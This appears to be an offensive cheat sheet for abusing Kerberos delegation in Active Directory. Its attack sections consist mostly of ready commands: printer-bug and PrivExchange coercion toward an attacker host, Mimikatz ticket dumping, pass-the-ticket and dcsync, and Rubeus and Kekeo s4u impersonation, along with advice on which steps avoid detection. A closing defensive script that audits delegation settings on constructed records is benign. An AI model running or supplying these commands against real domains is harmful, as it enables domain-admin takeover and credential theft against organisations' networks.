Delegation

Unconstrained delegation

Impersonate users who connect to the service against any Kerberos service.

Requirements

  1. Control over an account with unconstrained delegation privileges
  2. A way to make victim users/computers connect to us

Make a DA connect to us

Chain with the print server bug or the PrivExchange bug to get Domain Administrator.

.\SpoolSample.exe <DC> <compromised_host>
python printerbug.py <VICTIM>/<user>:<password>@<dc.internal.dom> <client_share>
python privexchange.py -u <user> -p <password> -ah <evil.internal.dom> <exchange.internal.dom> -d <internal.dom>

Mimikatz

Opsec unsafe

It touches LSASS!

The user <COMPUTER$> should get the TGT

sekurlsa::tickets
kerberos::ptt ticket.kirbi
lsadump::dcsync /domain:<domain> /user:<user>

Rubeus

Opsec safe

It uses LSACallAuthenticationPackage with a GetSystem token elevation approach, but LSASS isn’t touched!

Rubeus.exe dump
Rubeus.exe monitor [/interval:SECONDS] [/filteruser:USER]

Constrained delegation

Impersonate authenticated users who connect to the service, but only against specific Kerberos services on servers.

Kekeo

Request TGT

tgt::ask /user:<VULN_ACCOUNT> /domain:<DOMAIN> /rc4:<RC4key>
tgt::ask /user:<VULN_ACCOUNT> /domain:<DOMAIN> /aes:<AESkey>

Pass-the-Ticket via s4u

tgs::s4u /user:<IMPERSONATED_USER>@<domain> /service:<DELEGATED_SVC>/<FQDN_MACHINE> /ptt /tgt:<TGT_FILE>

Rubeus

Pass-the-Ticket via s4u

Rubeus.exe s4u /user:<user_with_delegation> /domain:<DOMAIN> /rc4:<RC4key> /impersonateuser:<user_impersonated> /msdsspn:"<delegated_svc>/<FQDN_machine>" /ptt

Constrained delegation with Protocol Transition

Impersonate any user to specific Kerberos services on servers. Also called 'Kerberos magic'.

Resource-based Constrained delegation

Enables delegation to be configured on the resource instead of on the account.
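
From the defender's side, the four delegation types above can be told apart from directory attributes. The following audit sketch is an added example, not part of the original page: it assumes entries exported from LDAP as dictionaries, relies on the documented userAccountControl bits and the msDS-AllowedToDelegateTo / msDS-AllowedToActOnBehalfOfOtherIdentity attributes, and runs on constructed sample records with made-up names.

```python
# Added example: classify AD accounts by the delegation type configured on them.
# Flag values are the documented userAccountControl bits; records are constructed.
UF_SERVER_TRUST_ACCOUNT = 0x2000          # domain controller computer account
UF_TRUSTED_FOR_DELEGATION = 0x80000       # unconstrained delegation
UF_NOT_DELEGATED = 0x100000               # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition


def classify(entry):
    """Return the list of delegation findings for one directory entry (a dict)."""
    uac = int(entry.get("userAccountControl", 0))
    findings = []
    # Domain controllers carry the unconstrained flag by design; skip them.
    if uac & UF_TRUSTED_FOR_DELEGATION and not uac & UF_SERVER_TRUST_ACCOUNT:
        findings.append("unconstrained")
    if entry.get("msDS-AllowedToDelegateTo"):
        pt = uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION
        findings.append("constrained+protocol-transition" if pt else "constrained")
    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("resource-based")
    return findings


def audit(entries):
    """Return (account -> findings, privileged accounts that can still be delegated)."""
    report = {e["sAMAccountName"]: classify(e) for e in entries if classify(e)}
    delegable_admins = [e["sAMAccountName"] for e in entries
                        if e.get("adminCount") == 1
                        and not int(e["userAccountControl"]) & UF_NOT_DELEGATED]
    return report, delegable_admins


# Constructed sample records (shape of an LDAP export; all names are made up).
SAMPLE = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000 | 0x80000},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000 | 0x80000},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/db01.example.internal:1433"]},
    {"sAMAccountName": "svc_app", "userAccountControl": 0x200 | 0x1000000,
     "msDS-AllowedToDelegateTo": ["HTTP/app01.example.internal"]},
    {"sAMAccountName": "FILE01$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"<constructed security descriptor>"},
    {"sAMAccountName": "adm_alice", "userAccountControl": 0x200, "adminCount": 1},
    {"sAMAccountName": "adm_bob", "userAccountControl": 0x200 | 0x100000, "adminCount": 1},
]

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Non-DC accounts reported as unconstrained, and privileged accounts missing the "sensitive and cannot be delegated" flag, are the ones to review first.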